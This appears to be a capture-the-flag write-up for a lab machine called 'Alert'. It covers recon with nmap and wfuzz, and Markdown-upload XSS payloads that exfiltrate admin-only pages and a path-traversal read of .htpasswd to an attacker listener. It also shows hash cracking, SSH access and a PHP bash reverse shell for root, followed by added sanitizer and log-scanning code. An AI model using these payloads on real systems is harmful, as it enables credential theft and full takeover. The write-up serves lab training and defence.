Alert

The document details a penetration testing process using tools like nmap and wfuzz to identify open ports and subdomains on a target server. It describes exploiting a Markdown file upload feature to execute JavaScript and retrieve sensitive files, eventually leading to gaining SSH access as a user named Albert. The final steps involve leveraging file permissions to create a PHP reverse shell for root access.
With nmap we will check which ports are open and which services are running.

sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.129.36.72 -oG allPorts

nmap -sCV -p22,80 10.129.36.72 -oN target

We can see that on port 80, in the second line of the output, the hostname of the HTTP service
appears, so we add it to the /etc/hosts file together with the IP to be able to open the page.

sudo nano /etc/hosts

We are going to search for subdomains with a status code other than 301 using
the wfuzz tool.

wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -H "Host: FUZZ.alert.htb" http://alert.htb/ | grep -v "301"

We find one subdomain, statistics.alert.htb, which must also be added to the /etc/hosts file.
On the page that is on port 80, we can upload Markdown (.md) files and send a
request to the administrator.

After some searching, we find that we can trigger some actions from the Markdown
file. Also, if we upload the file and press the Share button, we can send the file link
to the administrator, who will open it.

We can check that it works with a JavaScript alert:

<!-- XSS with regular tags -->


<script>alert(1)</script>
<img src=x onerror=alert(1) />
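The upload works because the rendered Markdown keeps raw HTML. An added example (not code from the writeup or from the target application) of the server-side fix: an allowlist sanitizer built only on the Python standard library that drops script/style content, every on* handler and any javascript: or data: URL, and reports what it removed so the application can log attempts like the payloads above. The tag and attribute allowlist is an assumption about what a Markdown viewer needs.

```python
from html import escape
from html.parser import HTMLParser

# Constructed allowlist: what a Markdown viewer needs, nothing that executes script.
ALLOWED_TAGS = {"p", "br", "strong", "em", "code", "pre", "ul", "ol", "li",
                "h1", "h2", "h3", "a", "img", "blockquote"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
SAFE_PREFIXES = ("http://", "https://", "/")   # rejects javascript: and data: URLs
VOID_TAGS = {"br", "img"}
RAW_TEXT_TAGS = {"script", "style"}            # their text content is dropped whole

class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.dropped, self.skipping = [], [], None

    def handle_starttag(self, tag, attrs):
        if tag in RAW_TEXT_TAGS:
            self.skipping = tag
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            # Drop every on* event handler and any attribute not on the allowlist.
            if name.startswith("on") or name not in ALLOWED_ATTRS.get(tag, ()):
                self.dropped.append(f"{tag}@{name}")
            elif name in ("href", "src") and not value.lower().startswith(SAFE_PREFIXES):
                self.dropped.append(f"{tag}@{name}={value}")
            else:
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag == self.skipping:
            self.skipping = None
        elif tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self.skipping is None:          # inside <script>/<style> nothing survives
            self.out.append(escape(data))

def sanitize(html):
    """Return (clean_html, dropped); `dropped` lists removed tags/attributes for logging."""
    s = Sanitizer()
    s.feed(html)
    s.close()
    return "".join(s.out), s.dropped
```

Run the two payloads from the writeup through sanitize() and both come back inert, with the script tag and the onerror attribute listed in `dropped`.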

We can try to obtain information from one of the routes to which we do not have
access, such as messages.

<script>
  fetch("http://alert.htb/messages/")
    .then(response => response.text())
    .then(data => {
      return fetch("http://IP:4444/", {
        method: "POST",
        body: data
      });
    })
    .then(response => response.text())
    .then(result => {
      console.log(result);
    })
    .catch(error => {
      console.error('Error:', error);
    });
</script>

Using the code above, we make the administrator open the file for us and send us
the content, and we receive the response with nc.

After uploading the file, what we do is to hit 'Share' and copy the URL and then
prepare Netcat and send the request to the administrator.

nc -lvnp 4444

But it tells us the same thing: that we don't have permissions.

If we Google default configuration files for an Apache server, we find the following
path: /etc/apache2/sites-enabled/000-default.conf. So, let's repeat the above,
this time requesting a PHP file called messages.php with its file parameter
pointing at the configuration file.

<script>
  fetch("http://alert.htb/messages.php?file=../../../../../../../../etc/apache2/sites-enabled/000-default.conf")
    .then(response => response.text())
    .then(data => {
      return fetch("http://IP:4444/", {
        method: "POST",
        body: data
      });
    })
    .then(response => response.text())
    .then(result => {
      console.log(result);
    })
    .catch(error => {
      console.error('Error:', error);
    });
</script>

We see that there is a path to what could be a file with passwords called
.htpasswd. So, let's do the same process, but with this new file:
http://alert.htb/messages.php?file=../../../var/www/statistics.alert.htb/.htpasswd
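Both requests above leave a clear trace in the Apache access log. An added example (not part of the writeup) of the detection side: a Python scanner that parses combined-format log lines, decodes the query string repeatedly so double-encoded traversal such as ..%252f is caught, and flags any parameter whose value walks out of its directory or names a sensitive file. The log lines are constructed (IPs and timestamps made up; the file= values mirror the requests discussed above).

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format lines; IPs and timestamps are made up.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2025:10:00:01 +0000] "GET /messages.php?file=2024-03-10_15-48-34.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.9 - - [01/Jan/2025:10:00:07 +0000] "GET /messages.php?file=../../../../etc/apache2/sites-enabled/000-default.conf HTTP/1.1" 200 1337 "-" "Mozilla/5.0"
10.10.14.9 - - [01/Jan/2025:10:00:09 +0000] "GET /messages.php?file=..%252f..%252f..%252fvar/www/statistics.alert.htb/.htpasswd HTTP/1.1" 200 90 "-" "curl/8.0"
10.10.14.2 - - [01/Jan/2025:10:00:12 +0000] "GET /index.php?page=contact HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
SENSITIVE = ("/etc/", "/proc/", "/root/", ".htpasswd")   # assumed list, extend as needed

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (..%252f -> ..%2f -> ../) up to `rounds` times."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(target):
    """Return (param, decoded_value) pairs whose value leaves the intended directory."""
    hits = []
    query = urlsplit(target).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:                       # parse_qs already decoded once
            decoded = fully_decode(value).replace("\\", "/")
            if ".." in decoded.split("/") or any(s in decoded for s in SENSITIVE):
                hits.append((name, decoded))
    return hits

def scan_log(text):
    """Parse each access-log line and emit one alert per suspicious parameter."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, decoded in suspicious_params(m["target"]):
            alerts.append({"ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                           "param": name, "value": decoded})
    return alerts
```

A 200 status on a flagged request, as in the two sample lines from 10.10.14.9, means the traversal succeeded and the served file should be treated as disclosed.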

And we get a file in which, apparently, there is a user with a password hash. If you want to
know what kind of hash it is, you can search for 'Hash Identifier' and paste it there; then
crack it with either of the following commands:

hashcat -m 1600 -a 0 pass.txt /usr/share/wordlists/rockyou.txt

john --format=md5crypt-long --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

We connect as Albert via SSH.

ssh albert@IP

Once inside the system, we can observe two things. If we use the command id,
we will see that our user belongs to a peculiar group: uid=1000(albert),
gid=1000(albert), groups=1000(albert), 1001(management).

With the following command, we can search for all the files that belong to that
specific group. Its output reports that our user has full permissions on
/opt/website-monitor/config/configuration.php.

find / -type f -group management 2>/dev/null

From the absolute path of the file, we can infer that there is another local web
service (it was not reported in our nmap scan, so it listens only internally).
We list the internal listening ports with netstat -tuln.

If we use ps aux, we can see that the service is running as root, so we proceed
with port forwarding (make sure that your port {port} is not in use).

ssh -L {port}:localhost:8080 albert@IP

After reviewing /opt/website-monitor/config/configuration.php in more detail, it
turns out that our user has full permissions over the entire /config folder. Judging
by the simplicity of the application, we should be able to access any file within the
/website-monitor directory. With our write permissions on the /config folder, we
can create a file with a PHP revshell hosted in that folder to get a shell as root.

<?php exec("/bin/bash -c 'bash -i >/dev/tcp/{IP}/{PORT} 0>&1'"); ?>

To activate the .php file, it is only necessary to enter its path in the browser:

http://localhost:{port}/config/payload.php.
